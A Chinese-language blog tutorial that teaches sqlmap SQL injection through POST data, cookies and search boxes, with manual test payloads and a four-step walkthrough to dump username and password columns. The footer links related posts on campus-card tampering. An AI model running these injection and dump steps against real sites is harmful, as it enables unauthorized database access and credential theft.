当前位置:首页 > 未分类 > 正文内容

(原创)sqlmap 注入初级教程 [sqlmap][sqlmap 指令][sqlmap 怎么用]

admin2天前未分类10

一、熟悉 sqlmap 之路:核心注入场景与方法

1. Sqlmap 之 Post 注入

Post 注入适用于表单提交(如登录页、数据提交页)等场景,核心是通过抓取 Post 请求数据进行注入测试,以下为 4 种常用方法:

方法一:基于请求文件(-r 参数)

# 基础用法(请求文件与sqlmap同目录)
sqlmap.py -r test.txt -p "post参数名" --dbs

# 完整路径用法(请求文件不在同目录)
sqlmap.py -r D:\\test.txt -p "post参数名" --dbs
  • 参数解释

    • -r test.txt:加载抓取的 Post 请求数据包(需将抓包内容保存为 test.txt);

    • -p "参数名":指定注入参数,提高测试精准度;

    • --dbs:若存在注入,返回目标数据库列表。

方法二:直接指定 URL 与 Post 数据(--data 参数)

sqlmap.py -u "目标URL(多为后台地址)" --data="Post包最后一行内容" -p "指定Post参数名"

方法三:针对带参数 URL 的 Post 注入

假设目标 URL:https://www.127.0.0.1/base64?id=10,测试 Post 注入:

sqlmap.py -u "https://www.127.0.0.1/base64" --data="id=10" -f --banner --dbs
  • 参数补充:-f(指纹识别)、--banner(获取数据库版本等 banner 信息)。

方法四:自动表单注入(--forms 参数)

适用于后台登录页等表单场景,自动识别表单并测试注入:

sqlmap.py -u "http://xxxxxx.com/login.asp" --forms

2. Sqlmap 之 Cookie 注入

Cookie 注入针对依赖 Cookie 验证的页面,需通过--level参数或直接指定 Cookie 触发测试:

方法一:基于探测等级(--level 参数)

假设目标 URL:https://www.127.0.0.1/base32?id=45,测试 Cookie 注入:

sqlmap.py -u "https://www.127.0.0.1/base32" --data="id=10" --dbs --level 2
  • 关键说明:--level 2(及以上)时,sqlmap 会自动尝试 Cookie 参数注入。

方法二:直接指定 Cookie(--cookie 参数)

# 基础用法
sqlmap.py -u "目标URL" --cookie="抓取的Cookie内容"

# 结合探测等级(可选)
sqlmap.py -u "目标URL" --cookie="抓取的Cookie内容" --level 2

3. Sqlmap 之搜索框注入

搜索框注入与 Post 注入逻辑类似,核心是定位搜索框对应的 Post 参数:

方法一:指定搜索框参数注入

sqlmap.py -u "http://xxxxxx.com/search.php" --data="搜索框抓包信息" -p "搜索框参数名"

搜索框注入手工判断(辅助验证)

  • 正常返回:' and 1=1 and '%'='(返回所有搜索结果);

  • 无返回:' and 1=2 and '%'='(无搜索结果);

  • MSSQL 数据库验证:' and exists (select * from sysobjects) and '%'='(返回正常则存在注入)。

实例参考(补天提交的搜索框注入)

**img

补充:MSSQL 系统对象表参考

**img

二、实战流程:sqlmap 注入 + Dump 账号密码(四步走)

以某注入点为例,完整获取账号密码的操作步骤:

步骤 1:判断注入点

sqlmap.py -u "存在注入的URL"

步骤 2:获取数据库列表

sqlmap.py -u "存在注入的URL" --dbs

步骤 3:定位目标数据库与表

# 查看当前使用的数据库
sqlmap.py -u "存在注入的URL" --current-db

# 列出指定数据库的所有表(-D指定数据库名)
sqlmap.py -u "存在注入的URL" -D "当前数据库名" --tables

# 列出指定表的字段(-T指定表名)
sqlmap.py -u "存在注入的URL" -D "当前数据库名" -T "目标表名" --columns

步骤 4:Dump 敏感字段(账号、密码等)

# -C指定敏感字段(如username、password、email),--dump导出数据
sqlmap.py -u "存在注入的URL" -D "当前数据库名" -T "目标表名" -C "username,password,email" --dump

三、核心总结

  • 注入逻辑通用:无论 Post、Cookie 还是搜索框注入,核心流程均为 “判断注入点→获取数据库→定位表字段→Dump 敏感数据”,仅需根据场景调整参数;

  • 参数优先级:-r(请求文件)、--data(Post 数据)、--cookie(Cookie 内容)用于定位注入载体,-p(指定参数)、--level(探测等级)用于提高测试精准度;

  • 实战建议:优先使用--forms或-r参数简化操作,复杂场景结合-D/-T/-C精准定位数据。


扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=32

分享给朋友:

“(原创)sqlmap 注入初级教程 [sqlmap][sqlmap 指令][sqlmap 怎么用]” 的相关文章

(原创)Web 渗透实例之中国教育部青少年普法网站逻辑漏洞【网站逻辑漏洞】【网站逻辑漏洞挖掘】【网站逻辑漏洞实例】

(原创)Web 渗透实例之中国教育部青少年普法网站逻辑漏洞【网站逻辑漏洞】【网站逻辑漏洞挖掘】【网站逻辑漏洞实例】

重要声明:此漏洞于 2016 年 12 月 2 号由社团成员挖掘出来,已经第一时间提交到补天,现已修复,发出来仅供学习与讨论,请勿用于非法途径!!!一、漏洞基本信息漏洞关联网站:中国教育部青少年普法网站用户登录界面地址:https://user.qspfw.com具体漏洞页面:用户密码找回界面,地址...

(原创)想学黑阔?这些书可以带你飞![web 安全书籍]

(原创)想学黑阔?这些书可以带你飞![web 安全书籍]

这些是我多年前收集的一些 web 安全相关书籍,虽当初未能坚持系统学习,但书籍本身质量较好,现分享给大家,希望能为想学 web 安全的朋友提供帮助!书籍资源获取百度云链接:http://pan.baidu.com/s/1jHVch9O提取密码:bauj...

(原创)还在用软件翻墙?看我几秒搞定!

首先说下原理,修改设备 hosts 文件信息,将各大国外网站域名直接指向服务器 ip,绕过国家的 GFW 防火墙,从而可以访问 Google、Facebook、ebay、YouTube、Yahoo、、、太多还是不打了,自己测试-------------------------------------...

(原创) 校园卡破解系列之数据修改 [pm3 破解饭卡][pm3 修改数据][校园卡修改][IC 卡修改数据]

(原创) 校园卡破解系列之数据修改 [pm3 破解饭卡][pm3 修改数据][校园卡修改][IC 卡修改数据]

(二)吃不完的饭卡提升完 IC 卡权限,就该考虑能不能修改饭卡金额了。通过两次消费前后饭卡数据的对比分析,发现虽然卡片数据包含较多扇区和区块,但消费前后变化的地方仅涉及两个扇区,这为后续分析提供了便利。通过十六进制与十进制转换,可进一步拆解变化的数据:消费后金额:373.2(数字:37320;16...

(原创)微信跳一跳辅助跳跃教程,轻轻松松拿高分!

(原创)微信跳一跳辅助跳跃教程,轻轻松松拿高分!

一、前期准备:模拟器配置1. 核心工具与系统要求模拟器:逍遥模拟器(需安装多开器)系统版本:通过多开器创建 “安卓 5.1” 系统的模拟器实例设备型号设置:在模拟器中将设备型号改为 “小米 5S”(适配辅助工具兼容性)2. 微信与游戏准备在模拟器中下载并安装微信,登录账号后打开 “跳一跳” 游戏,确...